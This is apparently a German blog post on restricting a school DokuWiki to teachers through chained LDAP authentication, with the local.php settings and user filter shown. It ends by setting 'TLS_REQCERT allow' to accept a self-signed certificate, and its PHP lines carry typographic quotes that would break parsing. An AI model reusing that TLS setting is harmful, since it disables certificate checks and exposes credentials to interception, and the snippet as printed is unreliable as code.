Dann wurde die dokuwiki/config/local.php umgestaltet. Hier die Variablen, die am Ende des Config-Marathons endlich die intendierte Wirkung hatten:

$conf['authtype'] = ‘authchained';
$conf['defaultgroup'] = ‘visitor';
$conf['disableactions'] = ‘register';
$conf['plugin']['authldap']['server'] = ‘ldaps://ip.des.servers.tld:636?;
$conf['plugin']['authldap']['port'] = 636;
$conf['plugin']['authldap']['usertree'] = ‘dc=schule,dc=ort,dc=schule-bw,dc=de';
$conf['plugin']['authldap']['userfilter'] = ‘(&(uid=%{user})(objectClass=ldUserAccount)(ldRole=teacher))';
$conf['plugin']['authldap']['version'] = 3;
$conf['plugin']['authchained']['authtypes'] = ‘authldap:authplain';
$conf['plugin']['authchained']['usermanager_authtype'] = ‘authplain';
$conf['auth']['chained']['authtypes'] = ‘ldap,plain';
$conf['auth']['chained']['usermanager_authtype'] = ‘plain';
$conf['auth']['chained']['find_auth_by_password'] = ‘false';
$conf['auth']['ldap']['version'] = ‘3’;

ldUserAccount und ldRole sind spezifisch für MySHN bzw. LogoDidact Systeme. Andere Schulserver-Lösungen haben sicherlich andere Bezeichnungen. Die Einträge in den LDAP von LMN sind in deren Wiki hervorragend dokumentiert und lieferten auch für obige LD-Lösung viele Ideen:

http://www.linuxmuster.net/wiki/anwenderwiki:webapps:portfolio#anpassen_der_grundkonfiguration_des_osp

Anmeldeversuche von SuS werden nun mit der Fehlermeldung “Benutzername und / oder Passwort unbekannt” abgewiesen. Dokuwiki sucht schließlich nicht im LDAP-Baum nach allen Menschen auf ServerG, sondern nur noch nach LuL. Vermutlich ist das overkill, denn im Userfilter steht ja ebenfalls drin, dass nur LuL reindürfen. Aber es funktioniert und scheint mir sicherer zu sein.

Da der schulische LD-Server für LDAPs nur ein self-signed Zertifikat ausliefert kommt noch ein Eintrag in die /etc/ldap/ldap.conf auf dem Dokuwiki-Server

TLS_REQCERT allow